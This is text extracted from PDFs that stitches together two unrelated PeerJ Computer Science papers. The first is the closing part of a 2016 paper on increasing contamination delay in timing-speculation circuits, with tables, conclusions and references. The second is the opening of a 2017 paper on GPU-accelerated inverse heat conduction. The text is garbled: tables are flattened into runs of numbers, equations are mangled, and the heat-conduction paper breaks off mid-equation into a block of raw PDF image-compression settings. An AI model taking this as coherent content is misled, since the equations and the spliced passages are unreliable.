10.9 T30 17.4 18.8 20.4 11.9 12.9 13.4 14.1 c1908 T10 0.6 0.7 0.8 0.9 1.0 1.1 1.2 T15 1.4 1.8 2.0 2.1 2.3 2.4 2.6 T20 2.8 2.9 3.4 3.4 3.6 3.8 4.0 T25 4.5 4.6 4.9 5.2 4.9 5.1 5.4 T30 6.3 6.5 6.5 6.9 7.2 7.9 6.8 c2670 T10 3.8 4.1 4.4 4.7 4.9 5.2 5.5 T15 6.8 7.3 7.7 8.2 8.7 9.2 9.6 T20 9.9 10.5 11.2 11.9 12.5 13.2 13.8 T25 13.2 14.4 15.0 15.6 16.4 17.2 18.0 T30 16.4 19.1 18.4 21.5 21.4 22.5 22.3 c3540 T10 0.5 0.6 0.6 0.7 0.7 0.8 0.9 T15 1.5 2.1 2.0 2.3 2.6 2.9 3.2 T20 4.0 3.9 5.7 4.8 5.2 5.7 6.1 T25 5.7 13.1 7.4 10.4 11.2 8.5 9.1 T30 8.0 11.6 14.5 10.0 33.5 15.9 20.4 c5315 T10 3.4 5.0 5.5 6.0 6.5 7.0 7.5 T15 10.5 11.0 11.0 11.8 12.5 13.3 14.1 T20 16.9 18.1 17.7 17.7 18.8 19.9 20.9 T25 27.1 28.2 24.9 23.9 25.1 26.4 27.7 T30 31.7 43.9 36.3 45.7 40.6 33.0 34.5 (continued on next page) Avirneni et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.79 22/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.79 Table 5 (continued) Ckt L0 L5 L10 L15 L20 L25 L30 c7552 T10 2.3 2.3 2.5 2.6 2.8 3.0 3.2 T15 4.0 4.3 4.7 5.0 5.4 5.8 6.1 T20 6.5 6.9 7.5 8.0 8.5 9.1 9.6 T25 9.5 10.9 11.3 11.1 12.3 12.5 13.1 T30 17.0 16.5 18.4 17.6 15.0 15.9 16.7 Several optimization techniques, involving clustering, logic analysis and gate resizing are proposed in Touati, Savoj & Brayton (1991), Rohfleisch, Wurth & Antreich (1995), Entrena et al. (1996), Fang & Jone (1995) and Lu et al. (1998). A statistical timing analysis approach is investigated in Jyu & Malik (1993). A re-timing and re-synthesis approach is presented in Pan (1999). This work suggests re-synthesizing the circuit to expose signal dependencies. The optimization scheme tightly constrains logic re-synthesis, so that the re-synthesized circuit is guaranteed to meet the performance target. Recent work in Kim, Joo & Kim (2013) focus on buffer insertion to solve variation in clock skew. The authors in Lin, Lin & Ho (2011) explore adjustable delay buffer insertion for minimizing clock skew in multi voltage designs. Buffer insertion in the presence of process variation is explored in Xiong & He (2006) with the focus on improving yield. The authors in Dynatune propose an algorithm based on min-cut approach to shorten the long path delay (Wan & Chen, 2009). It is based on simulation profiling and uses multiple threshold voltage cells to reduce the delay of long paths. Even though our min-cut algorithm is similar to the Dynatune algorithm, it is applied to a drastically different aspect of timing speculation framework i.e., increasing contamination delay. Unlike Dynatune, our approach doesn’t use simulation profiling to drive the circuit optimization as hold time delay should be satisfied all the time. Therefore, our algorithm considers more tighter constraints than the Dynatune algorithm. Although there are several delay optimization approaches proposed in literature, all of them try to hold the critical path delay within a threshold. It is fundamental that all the timing optimization algorithms must consider short path timing constraints. Data latches in a pipelined architecture inherently possess set up and hold time constraints. It is necessary to make sure that the resulting circuit has no set-up or hold time violations, to guarantee correct data transfers. There are algorithms to make sure the circuit is free of any such violations considering both long and short paths (Fung, Betz & Chow, 2004). However, there is no consideration for short path constraints from the perspective of aggressive clocking we are dealing with. The authors in Ye et al. (2015) propose a steepest descent method (SDM) to determine the potential benefits of timing speculation. From the experiments conducted, it is found that circuit topology plays a big role in realizing the benefits of timing speculation. Our algorithm can be used for circuits that shows promising results using SDM approach analyzed with design parameters like process technology, desired frequency and voltage corners, error penalty of the implementation etc. In this paper, we try to alleviate the contamination delay limitation imposed on aggressive timing speculation architectures. Due to this, we fundamentally differ from all of the existing works. This is the first work Avirneni et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.79 23/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.79 aimed at increasing the contamination delay of digital circuits up to a given threshold. It is also important to point out that our algorithm works complementary to existing synthesis schemes and can also be integrated with physically aware timing optimizations that are used for achieving timing closure. CONCLUSIONS Contamination delay is one of the major bottlenecks for achieving higher performance in timing speculation architectures. In this paper, we investigated the theoretical margins for improving performance for the dual latch framework. We brought forward the limits to performance enhancements in timing speculation. Using our analysis, we demonstrated how much performance improvement is achievable by increasing the contamination delay of the circuit without affecting the critical path delays. Performance gains were attained even for the cases affecting propagation delay by up to 10%. We studied further how these gains vary with target timing error rate. The main goal of this paper is to increase the short path delays to a specified threshold, without (or minimally) affecting the critical path delays. We proposed the Min-Arc algorithm to achieve this goal. We studied ISCAS-85 circuits, where we have shown that the Min-Arc is able to increase the contamination delay of all the circuits without affecting propagation delay. We analyzed further as to how much these short paths increase while allowing a small leeway to critical path delay. We observed moderate area and power increase in the circuits implementing the Min-arc algorithm. Finally, we discuss how the algorithm preserves the path delay distributions of the circuits and therefore, closely maintaining the rate of timing error occurrences from the original circuit. As a future improvement, gate/cell sizing approach can be used instead of adding delay buffers for improved area, power results. To conclude, Min-arc algorithm successfully increases the contamination delay of logic circuits with moderate area and power overheads. The results we have obtained are very promising, opening up different directions for the near future. ADDITIONAL INFORMATION AND DECLARATIONS Funding The research reported in this paper is funded in part by the Information Infrastructure Institute and the Jerry R. Junkins Endowment at Iowa State University. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Information Infrastructure Institute. Jerry R. Junkins Endowment. Competing Interests Arun K. Somani is an Academic Editor for PeerJ Computer Science. Avirneni et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.79 24/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.79 Author Contributions • Naga Durga Prasad Avirneni, Prem Kumar Ramesh and Arun K. Somani conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. Data Availability The following information was supplied regarding data availability: The raw data was supplied as a Supplemental Dataset. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.79#supplemental-information. REFERENCES Austin TM. 1999. DIVA: a reliable substrate for deep submicron microarchitecture de- sign. In: Microarchitecture, 1999. MICRO-32. Proceedings. 32nd annual international symposium on. Piscataway: IEEE, 196–207. Avirneni N, Ramesh P, Somani A. 2016. Utilization aware power management in reliable and aggressive chip multi processors. IEEE Transactions on Computers 65(3):979–991. Avirneni NDP, Somani AK. 2012. Low overhead soft error mitigation techniques for high-performance and aggressive designs. IEEE Transactions on Computers 61(4):488–501 DOI 10.1109/TC.2011.31. Avirneni NDP, Somani AK. 2013. Countering power analysis attacks using reliable and aggressive designs. IEEE Transactions on Computers 63(6):1408–1420. Bezdek M. 2006. Utilizing timing error detection and recovery to dynamically improve superscalar processor performance. Master’s Thesis, Iowa State University. Burger D, Austin TM. 1997. The SimpleScalar tool set, version 2.0. ACM SIGARCH Computer Architecture News 25(3):13–25. Chen H-C, Du DH-C, Liu L-R. 1993. Critical path selection for performance optimiza- tion. IEEE Transactions on Computer-Aided Design of Integrated Circuits and Systems 12(2):185–195 DOI 10.1109/43.205000. Chen K-C, Muroga S. 1991. Timing optimization for multi-level combinational networks. In: Proceedings of the 27th ACM/IEEE design automation conference. New York: ACM, 339–344. Cheng L, Chen D, Wong MDF, Hutton M, Govig J. 2007. Timing constraint-driven technology mapping for FPGAs considering false paths and multi-clock domains. In: Proceedings of the 2007 IEEE/ACM international conference on Computer-aided design. Piscataway: IEEE Press, 370–375. Coudert O. 2010. An efficient algorithm to verify generalized false paths. In: Design automation conference (DAC), 2010 47th ACM/IEEE. Piscataway: IEEE, 188–193. Avirneni et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.79 25/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.79/supplemental-information http://dx.doi.org/10.7717/peerj-cs.79#supplemental-information http://dx.doi.org/10.7717/peerj-cs.79#supplemental-information http://dx.doi.org/10.1109/TC.2011.31 http://dx.doi.org/10.1109/43.205000 http://dx.doi.org/10.7717/peerj-cs.79 Das S, Roberts D, Lee S, Pant S, Blaauw D, Austin T, Flautner K, Mudge T. 2006. A self- tuning DVS processor using delay-error detection and correction. IEEE Journal of Solid-State Circuits 41(4):792–804 DOI 10.1109/JSSC.2006.870912. Du DH, Yen SH, Ghanta S. 1989. On the general false path problem in timing analysis. In: Proceedings of the 26th ACM/IEEE design automation conference. New York: ACM, 555–560. Edmonds J, Karp RM. 1972. Theoretical improvements in algorithmic efficiency for network flow problems. Journal of the ACM 19(2):248–264 DOI 10.1145/321694.321699. Entrena L, Olías E, Uceda J, Espejo J. 1996. Timing optimization by an improved redundancy addition and removal technique. In: Proceedings of the conference on European design automation. Piscataway: IEEE Computer Society Press, 342–347. Ernst D, Kim NS, Das S, Pant S, Rao R, Pham T, Ziesler C, Blaauw D, Austin T, Flautner K, Mudge T. 2003. Razor: a low-power pipeline based on circuit-level timing speculation. In: MICRO-36, 36th annual IEEE/ACM international symposium on microarchitecture, Piscataway: IEEE, 7–18. Fang C-L, Jone W-B. 1995. Timing optimization by gate resizing and critical path identification. IEEE Transactions on Computer-Aided Design of Integrated Circuits and Systems 14(2):201–217 DOI 10.1109/43.370424. Fung R, Betz V, Chow W. 2004. Simultaneous short-path and long-path timing opti- mization for FPGAs. In: Proceedings of the 2004 IEEE/ACM international conference on Computer-aided design. Piscataway: IEEE Computer Society, 838–845. Greskamp B, Torrellas J. 2007. Paceline: improving single-thread performance in nanoscale cmps through core overclocking. In: PACT’07 Proceedings of the 16th in- ternational conference on parallel architecture and compilation techniques. Piscataway: IEEE, 213–224. Greskamp B, Wan L, Karpuzcu UR, Cook JJ, Torrellas J, Chen D, Zilles C. 2009. Blueshift: designing processors for timing speculation from the ground up. In: IEEE 15th international symposium on high performance computer architecture, 2009. HPCA 2009. Piscataway: IEEE, 213–224. Gupta MS, Rivers JA, Bose P, Wei G-Y, Brooks D. 2009. Tribeca: design for PVT variations with local recovery and fine-grained adaptation. In: Proceedings of the 42nd annual IEEE/ACM international symposium on microarchitecture. New York: ACM, 435–446. Hansen MC, Yalcin H, Hayes JP. 1999. Unveiling the ISCAS-85 benchmarks: a case study in reverse engineering. IEEE Design & Test of Computers 16(3):72–80 DOI 10.1109/54.785838. Jyu H-F, Malik S. 1993. Statistical timing optimization of combinational logic circuits. In: Computer design: VLSI in computers and processors, 1993. ICCD’93. Proceedings., 1993 IEEE international conference on. Piscataway: IEEE, 77–80. Kim J, Joo D, Kim T. 2013. An optimal algorithm of adjustable delay buffer insertion for solving clock skew variation problem. In: Proceedings of the 50th annual design automation conference. New York: ACM, 90. Avirneni et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.79 26/27 https://peerj.com http://dx.doi.org/10.1109/JSSC.2006.870912 http://dx.doi.org/10.1145/321694.321699 http://dx.doi.org/10.1109/43.370424 http://dx.doi.org/10.1109/54.785838 http://dx.doi.org/10.7717/peerj-cs.79 Lin K-Y, Lin H-T, Ho T-Y. 2011. An efficient algorithm of adjustable delay buffer insertion for clock skew minimization in multiple dynamic supply voltage designs. In: Proceedings of the 16th Asia and South Pacific design automation conference. Piscataway: IEEE Press, 825–830. Lu A, Eisenmann H, Stenz G, Johannes FM. 1998. Combining technology mapping with post-placement resynthesis for performance optimization. In: Computer design: VLSI in computers and processors, 1998. ICCD’98. Proceedings. International conference on. Piscataway: IEEE, 616–621. Pan P. 1999. Performance-driven integration of retiming and resynthesis. In: Proceedings of the 36th annual ACM/IEEE design automation conference. New York: ACM, 243–246. Ramesh PK, Subramanian V, Somani AK. 2010. System level analysis for achieving thermal balance and lifetime reliability in reliably overclocked systems. International Journal on Advances in Systems and Measurements 2(4):258–268. Rohfleisch B, Wurth B, Antreich K. 1995. Logic clause analysis for delay optimization. In: Design automation, 1995. DAC’95. 32nd conference on. Piscataway: IEEE, 668–672. Shenoy NV, Brayton RK, Sangiovanni-Vincentelli AL. 1993. Minimum padding to satisfy short path constraints. In: Computer-aided design, 1993. ICCAD-93. Digest of Technical Papers., 1993 IEEE/ACM international conference on. Piscataway: IEEE, 156–161. Stine JE, Castellanos I, Wood M, Henson J, Love F, Davis WR, Franzon PD, Bucher M, Basavarajaiah S, Oh J, Jenkal R. 2007. FreePDK: an open-source variation-aware design kit. In: Proceedings of the 2007 IEEE international conference on microelectronic systems education. Piscataway: IEEE Computer Society, 173–174. Subramanian V, Bezdek M, Avirneni ND, Somani A. 2007. Superscalar processor performance enhancement through reliable dynamic clock frequency tuning. In: Dependable systems and networks, 2007. DSN’07. 37th annual IEEE/IFIP international conference on. Piscataway: IEEE, 196–205. Touati HJ, Savoj H, Brayton RK. 1991. Delay optimization of combinational logic cir- cuits by clustering and partial collapsing. In: Computer-aided design, 1991. ICCAD- 91. Digest of Technical Papers., 1991 IEEE international conference on. Piscataway: IEEE, 188–191. Tsai S, Huang C-Y. 2009. A false-path aware formal static timing analyzer considering simultaneous input transitions. In: Design automation conference, 2009. DAC’09. 46th ACM/IEEE. Piscataway: IEEE, 25–30. Wan L, Chen D. 2009. DynaTune: circuit-level optimization for timing speculation considering dynamic path behavior. Piscataway: IEEE, 172–179. Xiong J, He L. 2006. Fast buffer insertion considering process variations. In: Proceedings of the 2006 international symposium on Physical design. New York: ACM, 128–135. Ye R, Yuan F, Zhang J, Xu Q. 2015. On the premises and prospects of timing speculation. In: Proceedings of the 2015 design, automation & test in Europe conference & exhibition. San Jose: EDA Consortium, 605–608. Avirneni et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.79 27/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.79 work_agwx3vvgsne2zexujz6g3vtzje ---- Submitted 4 May 2017 Accepted 24 October 2017 Published 20 November 2017 Corresponding author Sándor Szénási, szenasi.sandor@nik.uni-obuda.hu Academic editor Miriam Leeser Additional Information and Declarations can be found on page 18 DOI 10.7717/peerj-cs.138 Copyright 2017 Szénási Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Solving the inverse heat conduction problem using NVLink capable Power architecture Sándor Szénási John von Neumann Faculty of Informatics, Óbuda University, Budapest, Hungary ABSTRACT The accurate knowledge of Heat Transfer Coefficients is essential for the design of precise heat transfer operations. The determination of these values requires Inverse Heat Transfer Calculations, which are usually based on heuristic optimisation techniques, like Genetic Algorithms or Particle Swarm Optimisation. The main bottleneck of these heuristics is the high computational demand of the cost function calculation, which is usually based on heat transfer simulations producing the thermal history of the workpiece at given locations. This Direct Heat Transfer Calculation is a well parallelisable process, making it feasible to implement an efficient GPU kernel for this purpose. This paper presents a novel step forward: based on the special requirements of the heuristics solving the inverse problem (executing hundreds of simulations in a parallel fashion at the end of each iteration), it is possible to gain a higher level of parallelism using multiple graphics accelerators. The results show that this implementation (running on 4 GPUs) is about 120 times faster than a traditional CPU implementation using 20 cores. The latest developments of the GPU-based High Power Computations area were also analysed, like the new NVLink connection between the host and the devices, which tries to solve the long time existing data transfer handicap of GPU programming. Subjects Distributed and Parallel Computing, Graphics, Scientific Computing and Simulation, Software Engineering Keywords GPU, CUDA, Inverse heat conduction problem, Heat transfer, Parallelisation, Data- parallel algorithm, Simulation, NVLink, Graphics accelerator, Optimisation INTRODUCTION As a fundamental experience of modern materials science, material properties are influenced by the microstructure; therefore, these can be altered to improve the mechanical attributes (Oksman et al., 2014). One of the most widely used methods for this purpose is heat treatment which usually consists of two consecutive steps: heating up the work object to a given high temperature and cooling it down in a precisely controlled environment. It is necessary to know the attributes of the given material and the environment, to achieve the best results, especially the Heat Transfer Coefficient (HTC) which shows the amount of heat exchanged between the object and the surrounding cooling medium. The Inverse Heat Conduction Problem (IHCP—the determination of the HTC) is a typical ill-posed problem (Beck, Blackwell & Clair st, 1985; Alifanov, 1994; Felde, 2016b). Without any known analytical solution, most methods are based on the comparison How to cite this article Szénási (2017), Solving the inverse heat conduction problem using NVLink capable Power architecture. PeerJ Comput. Sci. 3:e138; DOI 10.7717/peerj-cs.138 https://peerj.com mailto:szenasi.sandor@nik.uni-obuda.hu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.138 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://dx.doi.org/10.7717/peerj-cs.138 of temperature signals recorded during real heat treatment processes and estimated by simulations. The aim of these methods is to find the HTC function giving the minimal deviation of the measured and predicted temperature data. It is usual to use heuristic algorithms, like Genetic Algorithms (GAs) (Szénási & Felde, 2017), Particle Swarm Optimisation (PSO) (Felde & Szénási, 2016; Szénási & Felde, 2015) or some hybrid approaches (Felde, 2016a) to find this parameter. Kim & Baek (2004) presented a hybrid genetic algorithm for the analysis of inverse surface radiation in an axisymmetric cylindrical enclosure. Verma & Balaji (2007) used a stochastic Particle Swarm Optimization to estimate several parameters in the field of inverse conduction-radiation. Both papers have significant contribution in the field of inverse methods. In the case of GAs, every chromosome of the population encodes one possible HTC function in its genes. These are two-dimensional continuous functions given by the time and location. Therefore, a limited number of control points have been used to approximate these (340 floating point values per HTC). With the already existing Direct Heat Conduction Problem (DHCP) solver methods (based on finite-elements or finite-difference techniques), it is feasible to simulate the cooling process and to record the thermal history for each chromosome. The difference between this generated thermal history and the measured one produces the cost value for the individual. The purpose of the IHCP process is to find the best gene values resulting in minimal cost. The bottleneck of this process is the high computational demand. The runtime of one cooling process simulation is about 200 ms using one traditional CPU core, and it is necessary to run these simulations for each chromosome in each iteration. Assuming a population of 2,000 chromosomes and a GA with 3,000 iterations, it takes several days to finish the search. Furthermore, according to the random behaviour of the GA and the enormously large search space, it is worth running multiple searches. As a result, an overall IHCP process can take many weeks. There are several attempts at using graphics accelerators to speed up physical simulations, and there are several substantial achievements in this field too. Satake, Yoshimori & Suzuki (2012) presented a related method to solve heat conduction equations using the CUDA Fortran language. They worked out a very well optimised method (analysing the PTX code generated by the compiler), but they only dealt with the one-dimensional unsteady heat conduction equation for temperature distribution. Klimeš & Štětina (2015) presented another model using the finite difference method to simulate the three-dimensional heat transfer. Their results showed that the GPU implementation is 33–68 times faster than the same CPU-based simulation using one Tesla C2075 GPU for running kernels. This significant speed up makes it possible to use their method in a real-time fashion. Narang, Wu & Shakur (2012) and Narang, Wu & Shakur (2016) also used programmable graphics hardware to speed up the heat transfer calculations based on a similar finite difference method. They used a Quadro FX 4800 card, and the speed up was still significant (about 20× in the case of a large number of nodes). There are also several papers from similar areas. Humphrey et al. (2012) and He et al. (2013) have very significant contributions to the field of radiative heat transfer problems. These also show that it is worth implementing GPU codes for physical simulations. Szénási (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.138 2/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.138 The main difference between these studies and this research is that this paper is focusing on the two-dimensional IHCP. Heat transfer simulation is a major part of the IHCP solving process; moreover, it is necessary to run thousands of simulations. Accordingly, it is feasible to use a higher level of parallelism by using multi-GPU architectures (the presented papers are usually deal with only one device). It is possible to install multiple graphics cards into a standard PC motherboard, and the CUDA programming environment can handle all of them. Using multiple GPUs can double/triple/quadruple the processing power, but it is necessary to adapt the algorithms to this higher level of parallelism. One of the most interesting developments of 2016 in HTC computing is the result of the IBM and NVIDIA collaboration, the NVLink high-speed interface between IBM’s POWER8 CPUs and NVIDIA’s Pascal GPUs. Data transfer between the host and device memory was an important bottleneck in GPU programming, making several promising applications practically unusable. This high-speed connection and the existence of multiple Pascal based graphics cards give developers the ability to accelerate applications more easily. The assumption was that it is worth implementing an IHCP solver system based on this architecture. Based on these advancements, a novel numerical approach and a massively parallel implementation to estimate the theoretical thermal history are outlined. The rest of the paper is structured as follows: the next section presents the novel parallel DHCP and IHCP solver methods; ‘Results and Discussion’ presents the raw results of the benchmarks and the detailed analysis; finally, the last section contains the conclusions and further plans. MATERIALS & METHODS Direct heat conduction problem There are various fundamental modes of heat transfer, but this paper deals only with transient conduction when the temperature of the workpiece changes as a function of time. The determination of the temperature of any points of the object at any moment often calls for some computer-assisted approximation methods. In the case of three-dimensional objects, these calculations can be very complicated and resource intensive, preventing the efficient usage as a GA cost function. For cylindrical objects, an essential simplification can significantly decrease the computational effort. As can be seen in Fig. 1 it is enough to model the middle cross-section of the cylinder, resulting in the two-dimensional axis-symmetrical heat conduction model. The radius of the cylinder is noted by R and Z. The cylinder is subjected to a longitudinal local coordinate and time varying Heat Transfer Coefficient HTC(z,t) on all its surfaces. Both the thermal conductivity, density and the heat capacity are varying with the temperature, k(T), ρ(T) and Cp(T). It has to be noted that phase transformations of the materials applied do not occur during the experiments, therefore latent heat generation induced by phase transformations is not considered. Based on this simplified model, the mathematical formulation of the nonlinear transient heat conduction can be described as Eq. (1), with the following initial and boundary Szénási (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.138 3/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.138 top bottom in s id e s u rf a c e z=0 z=Z r=R r=0 Figure 1 Two-dimensional axis-symmetrical heat conduction model. Full-size DOI: 10.7717/peerjcs.138/fig-1 conditions Eqs. (2)–(5): ∂ ∂r (k ∂T ∂r )+ k r ∂T ∂r + ∂ ∂z (k ∂T ∂z )+qv =ρCp ∂T ∂t (1) T(r =0,z,t =0)=T0, (2) k ∂T ∂z |0≤z≤L,r=R=HTC(z,t)[Tq−T(r =R,z,t)], (3) k ∂T ∂z |z=0,0≤r> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS /CHT